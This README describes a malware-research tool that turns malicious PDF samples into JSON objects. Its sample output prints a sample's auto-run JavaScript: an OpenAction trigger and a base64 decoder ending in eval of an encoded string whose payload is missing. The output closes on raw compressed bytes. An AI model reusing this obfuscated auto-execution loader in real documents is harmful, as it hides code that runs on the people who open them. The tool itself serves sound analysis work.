Malpdfobj
Builds a JSON representation of a PDF malware sample
== Purpose == This is a set of tools chained together to produce a JSON object representing the various pieces of a malicious PDF file.
== Research == http://blog.9bplus.com
== Usage ==
Usage: object_builder.py [options]
Builds a JSON object representing a malicious PDF
Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  file to build an object from
  -d DIR, --dir=DIR     dir to build an object from
  -m, --mongo           dump to a mongodb database
  -v, --verbose         verbose output
== Sample Output == (the "decoded" field below holds the decoded stream contents of the sample verbatim, so the output is itself untrusted data)
{
"contents": {
"objects": {
"object": [
{
"decoded": "Object contained no stream or decoding failed",
"encoded": "\r\n<<\r\n/OpenAction << /JS 9 0 R /S /JavaScript >>\r\n/Type /Catalog\r\n/Pages 3 0 R\r\n>>\r\n",
"hex": "0D 0A 3C 3C 0D 0A 2F 4F 70 65 6E 41 63 74 69 6F 6E 20 3C 3C 20 2F 4A 53 20 39 20 30 20 52 20 2F 53 20 2F 4A 61 76 61 53 63 72 69 70 74 20 3E 3E 0D 0A 2F 54 79 70 65 20 2F 43 61 74 61 6C 6F 67 0D 0A 2F 50 61 67 65 73 20 33 20 30 20 52 0D 0A 3E 3E 0D 0A",
"id": 2,
"length": 84,
"md5": "211408b743a46d1c2c806d3af9884393",
"suspicious": 0,
"version": 0
},
{
"decoded": "Object contained no stream or decoding failed",
"encoded": "\r\n<<\r\n/Type /Pages\r\n/Kids [4 0 R]\r\n/Count 1\r\n>>\r\n",
"hex": "0D 0A 3C 3C 0D 0A 2F 54 79 70 65 20 2F 50 61 67 65 73 0D 0A 2F 4B 69 64 73 20 5B 34 20 30 20 52 5D 0D 0A 2F 43 6F 75 6E 74 20 31 0D 0A 3E 3E 0D 0A",
"id": 3,
"length": 49,
"md5": "9829c9b16eba23c82358cad900e4827c",
"suspicious": 0,
"version": 0
},
{
"decoded": "Object contained no stream or decoding failed",
"encoded": "\r\n<<\r\n/Type /Page\r\n/Parent 3 0 R\r\n>>\r\n",
"hex": "0D 0A 3C 3C 0D 0A 2F 54 79 70 65 20 2F 50 61 67 65 0D 0A 2F 50 61 72 65 6E 74 20 33 20 30 20 52 0D 0A 3E 3E 0D 0A",
"id": 4,
"length": 38,
"md5": "1184e200fcbb6bf356b4fd68626aece6",
"suspicious": 0,
"version": 0
},
{
"decoded": "\r\nvar keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";\r\nfunction decode64(input) {\r\n var output = "";\r\n var chr1, chr2, chr3;\r\n var enc1, enc2, enc3, enc4;\r\n var i = 0;\r\n input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");\r\n do {\r\n enc1 = keyStr.indexOf(input.charAt(i++));\r\n enc2 = keyStr.indexOf(input.charAt(i++));\r\n enc3 = keyStr.indexOf(input.charAt(i++));\r\n enc4 = keyStr.indexOf(input.charAt(i++));\r\n chr1 = (enc1 << 2) | (enc2 >> 4);\r\n chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);\r\n chr3 = ((enc3 & 3) << 6) | enc4;\r\n output = output + String.fromCharCode(chr1);\r\n if (enc3 != 64) {\r\n output = output + String.fromCharCode(chr2);\r\n }\r\n if (enc4 != 64) {\r\n output = output + String.fromCharCode(chr3);\r\n }\r\n } while (i < input.length);\r\n return output;\r\n}\r\nvar aasd = decode64("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");\r\neval(decode64(aasd));",
"encoded": "\r\n<</Filter /FlateDecode\r\n/Length 2642\r\n>>\r\nstream\r\nx\ufffd\ufffdXms\ufffd\ufffd\u0011\ufffd~3\ufffd\u001f\ufffd\ufffd\ufffd\ufffd'w\tA\ufffdj5w\ufffd\ufffd\ufffd"(3&d\ufffd\u0004@\ufffd\ufffd\ufffd\ufffd\u0002\u0013J\u0004)Z\ufffd-Y\ufffd\ufffd\ufffd.\ufffd\ufffd\ufffdv\ufffdi>8\ufffd\u0017\ufffd\ufffd\ufffd\ufffd\ufffdE\ufffd\ufffd\ufffd!\ufffd\u000e\ufffd\ufffd1\ufffdo\u0007\u001f\u0007?|\ufffd^\ufffdl\ufffd\ufffd\ufffd\ufffd\ufffd7\u001eY\ufffd\ufffd4\b\u0019\u0017Q,\ufffdt\ufffd\ufffd/\ufffd\ufffd\ufffd\ufffde\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdx2\ufffd9\u001cY\ufffd\ufffd\ufffdu\ufffd\ufffd\ufffd\ufffd\u001f~\ufffd\ufffd\ufffd/\ufffd\ufffdr\ufffd\ufffdT\u0003\ufffd-7*\u001b\ufffd.VU}\ufffd\ufffd\u001c\ufffd\ufffd\ufffd\ufffd\u0006\ufffdA\ufffdqs\ufffd\ufffd\ufffd4\u001e\u001b\ufffd\ufffd\ufffd\ufffd|\ufffd~l~\ufffd\ufffd\ufffd\ufffd\ufffd$\ufffd\ufffd \ufffd\ufffdf\ufffds\ufffd\ufffd\u001c=\ufffdW\ufffd\ufffd>[W\ufffd\ufffd\ufffd\ufffd~\ufffd\ufffd:Yf\u0017\u001f\ufffd\ufffd\ufffdO?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffd}\ufffd\ufffd\ufffd\ufffd?|\ufffd\u0011\ufffd_vZj\ufffd\u0007\u0007\u007f\u001ag\ufffd\u0003\ufffd\ufffd\ufffdR\ufffdq\ufffd\ufffdK\ufffd\ufffd2O\ufffd\ufffd\ufffd\u0017\ufffdw\ufffd.{\ufffdN\ufffd\ufffdV\ufffd\ufffd\ufffd*\ufffd\ufffdI\ufffd\ufffd\u0012\u0014.\ufffd\~\ufffde`^\u000e\ufffd\ufffd~\ufffd\ufffd_\u007f\u001d\ufffd^\u001dlb\ufffd\ufffdd\u007f\u001e 
\ufffd\ufffd9?:\ufffd\u001f6\ufffd\ufffdW\ufffd\ufffd\ufffd\ufffdC8?l\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd?O\u0005\ufffd\ufffd\ufffdn\u0000\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdl7\ufffd\u0015\ufffd|\u0005\ufffd\ufffdh\ufffd|\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdxt\ufffd\\ufffdo\ufffd\ufffd"\ufffd\ufffd\ufffd\u0018\u001e\ufffd_\ufffd\ufffdo\r\ufffd>8\ufffd+\ufffd\r.V\ufffd_z\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdl\u007f\ufffd\ufffdz\ufffd\ufffd+\ufffdj\ufffd\ufffd$;\u0005\ufffd\ufffdz\ufffd\u0007\ufffd\ufffd\ufffd\ufffd:\u000e\ufffdZ\ufffd\ufffd\ufffdcl(\u0011\ufffd\ufffd\ufffd\u001c\ufffdJy|\n\u0018w2A\ufffdt\ufffdo|s7l\ufffd\ufffd\ufffdFD\ufffd\u00055\ufffdf\\ufffd+\ufffd\ufffd\u001f\ufffd\ufffd\ufffd}3G\ufffd\ufffd$\ufffd\ufffd)S\ufffd\ufffd\ufffd \ufffdT\ufffd\ufffdn\ufffd\ufffdO\ufffd:Mo\u0002F\ufffd<\u0013\